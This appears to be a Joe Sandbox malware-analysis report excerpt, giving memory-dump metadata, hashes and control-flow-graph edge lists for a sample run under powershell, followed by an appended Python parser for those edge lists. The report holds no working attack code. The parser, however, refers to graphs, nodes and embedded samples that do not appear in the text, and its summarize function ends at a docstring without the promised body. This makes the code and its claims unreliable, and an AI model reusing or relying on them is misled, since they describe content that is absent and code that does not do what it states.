• Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CountCriticalDebugDebuggerErrorInitializeLastOutputPresentSectionSpinString
                                                                                                                                                                        • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                                                                                                                        • API String ID: 450123788-631824599
                                                                                                                                                                        • Opcode ID: a91fb9ec149cc98b32ca84c3966af20fec542bf184f62604ead91c85830e5ef2
                                                                                                                                                                        • Instruction ID: 68d4aacc3072624f802e91234c7fa0b653627373c2d940ef08c85d06b8aae8ef
                                                                                                                                                                        • Opcode Fuzzy Hash: a91fb9ec149cc98b32ca84c3966af20fec542bf184f62604ead91c85830e5ef2
                                                                                                                                                                        • Instruction Fuzzy Hash: 10E06D712007418FD770AF25E914746BBE4AF14754F00886EE49AD2662EBB6D488CBA1
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Execution Graph

                                                                                                                                                                        Execution Coverage:10.7%
                                                                                                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                        Signature Coverage:0%
                                                                                                                                                                        Total number of Nodes:3
                                                                                                                                                                        Total number of Limit Nodes:0
                                                                                                                                                                        execution_graph 17099 befe70 17100 befef3 CreateActCtxA 17099->17100 17101 beff33 17100->17101

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 59 bdc507-bdc51d 61 bddb2b-bddc33 59->61 62 bdc523-bdc534 59->62 63 bdc539-bdc53c 61->63 140 bddc39-bddc3b 61->140 62->63 64 bdc536 62->64 65 bddc40-bddc78 63->65 66 bdc542 63->66 64->63 68 bddd5e-bddde3 65->68 69 bddc7e-bddd58 65->69 66->61 77 bddf4d-bddff6 68->77 78 bddde9-bddf47 68->78 69->68 87 bddffc-bde11d 77->87 88 bde123-bde1bb 77->88 78->77 87->88 90 bde23e-bde37a 88->90 91 bde1c1-bde239 88->91 94 bde380-bde430 90->94 91->94 100 bde62d-bde7b9 94->100 101 bde436-bde627 94->101 125 bde7bf-bde998 100->125 126 bde99e-bdea50 100->126 101->100 125->126 155 bdea7b-bdeb94 126->155 156 bdea52-bdea76 126->156 140->63 160 bdeb9a-bdec07 155->160 156->160 170 bdec3e-bded10 160->170 171 bdec09-bdec39 160->171 174 bded16-bded7e 170->174 171->174 176 bdeeeb-bdef62 174->176 177 bded84-bdeee5 174->177 190 bdef64-bdf000 176->190 191 bdef96-bdefce 176->191 177->176 196 bdf00a-bdf02b 190->196 191->196 197 bdf030-bdf038 196->197 197->63
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.522889494.0000000000BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_bd0000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID: $%k$&;MJ
                                                                                                                                                                        • API String ID: 0-902953960
                                                                                                                                                                        • Opcode ID: b1912ab638f5af6e613d0f5aae0a01412e0dbff8e9640961e8c1a91f3d2b0da1
                                                                                                                                                                        • Instruction ID: 96120ca3538c6915836b7a8d37d77d84d72489977d1d8c7b70618e1964211cad
                                                                                                                                                                        • Opcode Fuzzy Hash: b1912ab638f5af6e613d0f5aae0a01412e0dbff8e9640961e8c1a91f3d2b0da1
                                                                                                                                                                        • Instruction Fuzzy Hash: 56D285B4E116288FDBA5CF68CD80B99BBF5EB48211F1091EAE50DA7341DB319E81CF54
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 555 bdbb08-bdbb69 560 bdbb6b-bdbb7f 555->560 561 bdbba7-bdbbcc 555->561 564 bdbb88-bdbba5 560->564 565 bdbb81 560->565 570 bdc01d-bdc03f 561->570 571 bdbbd2-bdbc50 561->571 564->561 565->564 574 bdc04f 570->574 575 bdc041-bdc047 570->575 586 bdbc5a-bdbc65 571->586 577 bdc050 574->577 575->574 577->577 587 bdbc6f-bdbcac 586->587 589 bdbfef-bdc004 587->589 590 bdbcb2-bdbd11 587->590 589->570 599 bdbd2f-bdbd58 590->599 600 bdbd13-bdbd2d 590->600 607 bdbd6a-bdbd7f 599->607 608 bdbd5a-bdbd68 599->608 605 bdbd8a-bdbd99 600->605 610 bdbd9f-bdbe10 605->610 611 bdbfda-bdbfe9 605->611 614 bdbd88 607->614 608->614 610->611 623 bdbe16-bdbe35 610->623 611->589 611->590 614->605 626 bdbf9b-bdbfae 623->626 627 bdbe3b-bdbe6d 623->627 628 bdbfb5-bdbfb9 626->628 637 bdbfb0 627->637 638 bdbe73-bdbf95 627->638 630 bdbfc9-bdc017 628->630 631 bdbfbb-bdbfc1 628->631 630->570 630->571 631->630 637->628 638->626 638->627
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.522889494.0000000000BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_bd0000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID: \iY
                                                                                                                                                                        • API String ID: 0-3899780892
                                                                                                                                                                        • Opcode ID: 126cec562c253ab2706bd50cd6634973cb13a7234ed967f0c2df959d3e6b9527
                                                                                                                                                                        • Instruction ID: 9a0d70c8f7033544af47fcadc9113e69a3a746c7399b2e2a08143961cf83af88
                                                                                                                                                                        • Opcode Fuzzy Hash: 126cec562c253ab2706bd50cd6634973cb13a7234ed967f0c2df959d3e6b9527
                                                                                                                                                                        • Instruction Fuzzy Hash: 79C15334B102058BDB44EBB5D951A6EBBE7EFC4300F218429E816AB395EF359C46CBD1
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 674 bdbaf8-bdbb69 680 bdbb6b-bdbb7f 674->680 681 bdbba7-bdbbcc 674->681 684 bdbb88-bdbba5 680->684 685 bdbb81 680->685 690 bdc01d-bdc03f 681->690 691 bdbbd2-bdbc50 681->691 684->681 685->684 694 bdc04f 690->694 695 bdc041-bdc047 690->695 706 bdbc5a-bdbc65 691->706 697 bdc050 694->697 695->694 697->697 707 bdbc6f-bdbcac 706->707 709 bdbfef-bdc004 707->709 710 bdbcb2-bdbd11 707->710 709->690 719 bdbd2f-bdbd58 710->719 720 bdbd13-bdbd2d 710->720 727 bdbd6a-bdbd7f 719->727 728 bdbd5a-bdbd68 719->728 725 bdbd8a-bdbd99 720->725 730 bdbd9f-bdbe10 725->730 731 bdbfda-bdbfe9 725->731 734 bdbd88 727->734 728->734 730->731 743 bdbe16-bdbe35 730->743 731->709 731->710 734->725 746 bdbf9b-bdbfae 743->746 747 bdbe3b-bdbe6d 743->747 748 bdbfb5-bdbfb9 746->748 757 bdbfb0 747->757 758 bdbe73-bdbf95 747->758 750 bdbfc9-bdc017 748->750 751 bdbfbb-bdbfc1 748->751 750->690 750->691 751->750 757->748 758->746 758->747
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.522889494.0000000000BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_bd0000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID: \iY
                                                                                                                                                                        • API String ID: 0-3899780892
                                                                                                                                                                        • Opcode ID: 8499abc13362e083620b3fa3ae6bdb245f0787c0702a35fe6a2cfe2fdfb1723a
                                                                                                                                                                        • Instruction ID: 5ffc2710dc1ac21152d9a039cbd171494bf8ed1781aa2cd846debe87bd474a9c
                                                                                                                                                                        • Opcode Fuzzy Hash: 8499abc13362e083620b3fa3ae6bdb245f0787c0702a35fe6a2cfe2fdfb1723a
                                                                                                                                                                        • Instruction Fuzzy Hash: 4FB16634B102058FDB44EBB5D951A6E7BE7EFC4300B218529E81AAB394EF359C06CBD1
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 779 bdbb01-bdbb69 785 bdbb6b-bdbb7f 779->785 786 bdbba7-bdbbcc 779->786 789 bdbb88-bdbba5 785->789 790 bdbb81 785->790 795 bdc01d-bdc03f 786->795 796 bdbbd2-bdbc50 786->796 789->786 790->789 799 bdc04f 795->799 800 bdc041-bdc047 795->800 811 bdbc5a-bdbc65 796->811 802 bdc050 799->802 800->799 802->802 812 bdbc6f-bdbcac 811->812 814 bdbfef-bdc004 812->814 815 bdbcb2-bdbd11 812->815 814->795 824 bdbd2f-bdbd58 815->824 825 bdbd13-bdbd2d 815->825 832 bdbd6a-bdbd7f 824->832 833 bdbd5a-bdbd68 824->833 830 bdbd8a-bdbd99 825->830 835 bdbd9f-bdbe10 830->835 836 bdbfda-bdbfe9 830->836 839 bdbd88 832->839 833->839 835->836 848 bdbe16-bdbe35 835->848 836->814 836->815 839->830 851 bdbf9b-bdbfae 848->851 852 bdbe3b-bdbe6d 848->852 853 bdbfb5-bdbfb9 851->853 862 bdbfb0 852->862 863 bdbe73-bdbf95 852->863 855 bdbfc9-bdc017 853->855 856 bdbfbb-bdbfc1 853->856 855->795 855->796 856->855 862->853 863->851 863->852
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.522889494.0000000000BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_bd0000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID: \iY
                                                                                                                                                                        • API String ID: 0-3899780892
                                                                                                                                                                        • Opcode ID: e4497aab7ffa5c0ac5b34879c4065d38480bd37b25b18e5d241b672571c823fd
                                                                                                                                                                        • Instruction ID: 385446973137df7251b44728d2820407f506b3b71ce86b9f1b1dcdc3a2c9b598
                                                                                                                                                                        • Opcode Fuzzy Hash: e4497aab7ffa5c0ac5b34879c4065d38480bd37b25b18e5d241b672571c823fd
                                                                                                                                                                        • Instruction Fuzzy Hash: 8FB15634B102059BDB44EBB5D951A6E7BE7EFC4300B218529E81AAB394DF359C06CBD1
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 884 bdc007-bdc00d 885 bdc015-bdc017 884->885 886 bdc01d-bdc03f 885->886 887 bdbbd2-bdbc50 885->887 890 bdc04f 886->890 891 bdc041-bdc047 886->891 902 bdbc5a-bdbc65 887->902 893 bdc050 890->893 891->890 893->893 903 bdbc6f-bdbcac 902->903 905 bdbfef-bdc004 903->905 906 bdbcb2-bdbd11 903->906 905->886 915 bdbd2f-bdbd58 906->915 916 bdbd13-bdbd2d 906->916 923 bdbd6a-bdbd7f 915->923 924 bdbd5a-bdbd68 915->924 921 bdbd8a-bdbd99 916->921 926 bdbd9f-bdbe10 921->926 927 bdbfda-bdbfe9 921->927 930 bdbd88 923->930 924->930 926->927 939 bdbe16-bdbe35 926->939 927->905 927->906 930->921 942 bdbf9b-bdbfae 939->942 943 bdbe3b-bdbe6d 939->943 944 bdbfb5-bdbfb9 942->944 951 bdbfb0 943->951 952 bdbe73-bdbf95 943->952 946 bdbfc9 944->946 947 bdbfbb-bdbfc1 944->947 946->884 947->946 951->944 952->942 952->943
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.522889494.0000000000BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_bd0000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID: \iY
                                                                                                                                                                        • API String ID: 0-3899780892
                                                                                                                                                                        • Opcode ID: c8b4481abc32f683a7211e6b77103c28d8de4c1fb50a3ef7505587d02512e507
                                                                                                                                                                        • Instruction ID: 566cc5befbf1388da86875df49f5ca45f224ead673baf1339d4481d386f30d84
                                                                                                                                                                        • Opcode Fuzzy Hash: c8b4481abc32f683a7211e6b77103c28d8de4c1fb50a3ef7505587d02512e507
                                                                                                                                                                        • Instruction Fuzzy Hash: 3F914334B102058BDB44EBB5D951B6E7BB7EFC8300F219429E81AAB394DE359C42CBD1
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.522889494.0000000000BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_bd0000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 71b9c19f0e2350b84b42c5bdd8f94ba978329c9cad913c27a7a8c841d6326f16
                                                                                                                                                                        • Instruction ID: 7ed3ad3b8b7097b00e62da0611dee8b7abffd467230245fb96efa0ee4b271257
                                                                                                                                                                        • Opcode Fuzzy Hash: 71b9c19f0e2350b84b42c5bdd8f94ba978329c9cad913c27a7a8c841d6326f16
                                                                                                                                                                        • Instruction Fuzzy Hash: 67817F74B101008FD745EBA4D851B6FBBBBEBC9310F248129E5169B388DE389D42CBD1
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.522889494.0000000000BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_bd0000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 8982dccb6ef055d7245166e8bcb48bf5fe942b442ecd1db73b5488e5edd34d3d
                                                                                                                                                                        • Instruction ID: 0e8c3b7e26c32284aeed6e4adb9af876c1e1a02a89729346797d28cc7c707bb6
                                                                                                                                                                        • Opcode Fuzzy Hash: 8982dccb6ef055d7245166e8bcb48bf5fe942b442ecd1db73b5488e5edd34d3d
                                                                                                                                                                        • Instruction Fuzzy Hash: F4819274B101008FD745EBA4D851B6FBBBBEBC8310F24816AF4169B388DE389D02CB91
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.522889494.0000000000BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_bd0000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: ecf4724a7feda7b200df0b18f8d7c97fa19bb8f0dc5116615a7ba1fbb6b6e22a
                                                                                                                                                                        • Instruction ID: 9f96cdcf95c37b47195bcdcf77091de5815ff6501c95e4b77fd96105c8c947aa
                                                                                                                                                                        • Opcode Fuzzy Hash: ecf4724a7feda7b200df0b18f8d7c97fa19bb8f0dc5116615a7ba1fbb6b6e22a
                                                                                                                                                                        • Instruction Fuzzy Hash: 0C819175B101008FD745EBA4D855B6FBBBBEBC8300F24816AF4169B388DE389D02CB91
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.522889494.0000000000BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_bd0000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 42d54e1f339a67f60ccc3e80ad74846fc6263ff39584aada343cbda8aef01f47
                                                                                                                                                                        • Instruction ID: 732c8a519442fd98d8662b5df2ac3dc5c6793be3df004c6b151e50196e0602ba
                                                                                                                                                                        • Opcode Fuzzy Hash: 42d54e1f339a67f60ccc3e80ad74846fc6263ff39584aada343cbda8aef01f47
                                                                                                                                                                        • Instruction Fuzzy Hash: 07818074B101008FD745EBA4D851B6FBBBBEBC8300F248129E5169B388DE389D02CB91
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.522889494.0000000000BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_bd0000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: a24f24f4ba9aea974dc28faab23162557448954d08d04ab9868e2afbe0983d34
                                                                                                                                                                        • Instruction ID: 9effd43299a3026f8ef32f88f1ae5ee77a8b587f89b5c1a3018c0b8926e41d9a
                                                                                                                                                                        • Opcode Fuzzy Hash: a24f24f4ba9aea974dc28faab23162557448954d08d04ab9868e2afbe0983d34
                                                                                                                                                                        • Instruction Fuzzy Hash: 4971D335A25104CFE705EFA5D895BAEBBF3EBC5300F2480A6E106A7395DE345C45CB91
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.522889494.0000000000BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_bd0000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: f94cfa0a0a7843c1723e4b9ce8cfa909e1471eac65dc74a0e822052ef4ba8ff5
                                                                                                                                                                        • Instruction ID: 87b606755af583b3612f584835bcd7bf52cc19178628dc8740bda5d7ef9e08b2
                                                                                                                                                                        • Opcode Fuzzy Hash: f94cfa0a0a7843c1723e4b9ce8cfa909e1471eac65dc74a0e822052ef4ba8ff5
                                                                                                                                                                        • Instruction Fuzzy Hash: FB619035A21104CFEB04EFA5D895BAEBBF3EBC9300F648066E506A7794EE345C45CB91
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.522889494.0000000000BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_bd0000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: f1f94476d1482d791239d8e359085d5f245dde21e40d24c123675511f6dce70a
                                                                                                                                                                        • Instruction ID: 87cb6ce6e9deca1ce30f38d056211d9750d408e2486158949779b1ce23f79644
                                                                                                                                                                        • Opcode Fuzzy Hash: f1f94476d1482d791239d8e359085d5f245dde21e40d24c123675511f6dce70a
                                                                                                                                                                        • Instruction Fuzzy Hash: C2618035A21104CFEB04EFA5D895BAEBBF3EBC9300F648066E506A7794DE349C45CB91
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.522889494.0000000000BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_bd0000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: b87490a88d8d1f9eb75cd0b383d51d1429fe7bd264660665214bced7b58a7fca
                                                                                                                                                                        • Instruction ID: 4de23ee2ccba83682c0ac6de0d7a3eae8042c02a7f934046feaf76cf1d2e13d2
                                                                                                                                                                        • Opcode Fuzzy Hash: b87490a88d8d1f9eb75cd0b383d51d1429fe7bd264660665214bced7b58a7fca
                                                                                                                                                                        • Instruction Fuzzy Hash: D7618135A21104CFEB04EFA5D895BAEBBF3EBC9300F648066E506A7794DE345C45CB91
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.522889494.0000000000BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_bd0000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID: (q$(q$(q
                                                                                                                                                                        • API String ID: 0-2705139113
                                                                                                                                                                        • Opcode ID: 869832789b361758d3e5bafc2423f2b3db3928a9bea0b75cea4dca45219838c8
                                                                                                                                                                        • Instruction ID: 182da1d4defc8487425ec287309d89a2c65dd3ee7a29d846bc40a47980a61f2d
                                                                                                                                                                        • Opcode Fuzzy Hash: 869832789b361758d3e5bafc2423f2b3db3928a9bea0b75cea4dca45219838c8
                                                                                                                                                                        • Instruction Fuzzy Hash: 88A17171A046099FCB14DFA9C4546DDFBF1EF88310F24855EE409AB390EB71AD45CB91
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000005.00000002.522889494.0000000000BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_5_2_bd0000_powershell.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID: @B/
                                                                                                                                                                        • API String ID: 0-3863299084
                                                                                                                                                                        • Opcode ID: bd9245bf960461085098e203e6e1c49f3bce9d286fa5e27d930c8f36bd8fe9bb
                                                                                                                                                                        • Instruction ID: 27083b5e5946cba52b8c9f937f896b0cd50fd2e7497f0e949457a81260b3d22d
                                                                                                                                                                        • Opcode Fuzzy Hash: bd9245bf960461085098e203e6e1c49f3bce9d286fa5e27d930c8f36bd8fe9bb
                                                                                                                                                                        • Instruction Fuzzy Hash: C0123934A002048FDB54EFA5D999B6EBBF2EF88300F24856AD41AAB355DF349D41CF91
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

Control-flow Graph
control_flow_graph 659 befe70-beff31 CreateActCtxA 661 beff3a-beff94 659->661 662 beff33-beff39 659->662 669 beff96-beff99 661->669 670 beffa3-beffa7 661->670 662->661 669->670 671 beffb8 670->671 672 beffa9-beffb5 670->672 672->671
APIs
• CreateActCtxA.KERNEL32(?), ref: 00BEFF21
Memory Dump Source
• Source File: 00000005.00000002.522957582.0000000000BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_be0000_powershell.jbxd
Similarity
• API ID: Create
• String ID:
• API String ID: 2289755597-0
• Opcode ID: b382ee33c0db96c424f8dd07996a39d6e38748003af22cef1727643b4d19c760
• Instruction ID: 7a4f9695f554506d0f309aa7e4247aeb55c95c88c6e67377907dfad69ec60227
• Opcode Fuzzy Hash: b382ee33c0db96c424f8dd07996a39d6e38748003af22cef1727643b4d19c760
• Instruction Fuzzy Hash: E241D2B1D00659CFDB24CFAAC844BDDBBF6BF89314F20816AD408AB251EB756945CF90
Uniqueness
Uniqueness Score: -1.00%
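
The control_flow_graph lines in this report are the text form of the graph images: a decimal block id followed by a hex address range, optional "call <target>" and API-name annotations on that block, and "a->b" edges. The parser below is an added example (not Joe Sandbox or IDA-plugin code) that reads that format as inferred from the lists on this page and pulls out what an analyst wants from one graph without rendering it: entry address, block and edge counts, resolved API names, blocks that jump to themselves (403->403 at bd9281 and 1192->1192 at bdbac7 in the lists here), and call sites the plugin lists with several candidate targets (bd8fbf with five and bd9124 with two in the bd8a78 graph, bd9365 with seven in the bd9373 graph). The grammar, the hex-address heuristic and the assumption that the first-listed block is the function entry are inferences from this page, not documented plugin behaviour; the two embedded samples are constructed from the bd8a78 list (trimmed to its opening tokens) and the complete CreateActCtxA list above.

```python
"""Parser for the text form of the report's control_flow_graph edge lists.

Added example, not Joe Sandbox or IDA-plugin code.  Grammar inferred from this
page (an assumption, not documented behaviour):
    <id> <start>[-<end>] [call <target>]* [<ApiName>]*   defines a basic block
    <id>-><id>                                           is a control-flow edge
Further assumptions: ids are decimal; addresses are hex and, in these dumps
(mapped at 0x00BD0000 / 0x00BE0000), always contain a hex letter; the first
block listed is the function entry.
"""
from __future__ import annotations

import re
from dataclasses import dataclass, field

EDGE = re.compile(r"^(\d+)->(\d+)$")
ADDR = re.compile(r"^[0-9a-f]+(?:-[0-9a-f]+)?$")


@dataclass
class Block:
    node_id: int
    start: int
    end: int | None = None                           # None for a one-address node ("401 bd8afc")
    calls: list[int] = field(default_factory=list)   # targets of "call <addr>" annotations
    apis: list[str] = field(default_factory=list)    # resolved API names, e.g. CreateActCtxA


@dataclass
class Cfg:
    blocks: dict[int, Block]                         # insertion order == order in the report
    edges: list[tuple[int, int]]


def parse_cfg(text: str) -> Cfg:
    """Tokenise one edge list; raises ValueError on a malformed list."""
    tokens = text.split()
    if tokens and tokens[0] == "control_flow_graph":
        tokens = tokens[1:]
    blocks: dict[int, Block] = {}
    edges: list[tuple[int, int]] = []
    cur: Block | None = None
    i = 0
    while i < len(tokens):
        tok = tokens[i]
        if (m := EDGE.match(tok)):
            edges.append((int(m.group(1)), int(m.group(2))))
            cur = None                               # annotations never follow an edge
        elif tok.isdigit():                          # new block: "<id> <addr>[-<addr>]"
            if i + 1 >= len(tokens) or not ADDR.match(tokens[i + 1]):
                raise ValueError(f"block {tok} has no address (token {i})")
            lo, _, hi = tokens[i + 1].partition("-")
            cur = Block(int(tok), int(lo, 16), int(hi, 16) if hi else None)
            blocks[cur.node_id] = cur
            i += 1
        elif cur is None:
            raise ValueError(f"annotation {tok!r} outside a block (token {i})")
        elif tok == "call":
            if i + 1 >= len(tokens) or not ADDR.match(tokens[i + 1]):
                raise ValueError(f"call without target (token {i})")
            cur.calls.append(int(tokens[i + 1], 16))
            i += 1
        else:
            cur.apis.append(tok)                     # anything else is a resolved API name
        i += 1
    for a, b in edges:
        if a not in blocks or b not in blocks:
            raise ValueError(f"edge {a}->{b} references an undefined block")
    return Cfg(blocks, edges)


def is_well_formed(text: str) -> bool:
    try:
        parse_cfg(text)
        return True
    except ValueError:
        return False


def summarize(cfg: Cfg) -> dict:
    """Entry, size, API names, call targets, self-looping blocks, and call
    sites the plugin listed with more than one candidate target."""
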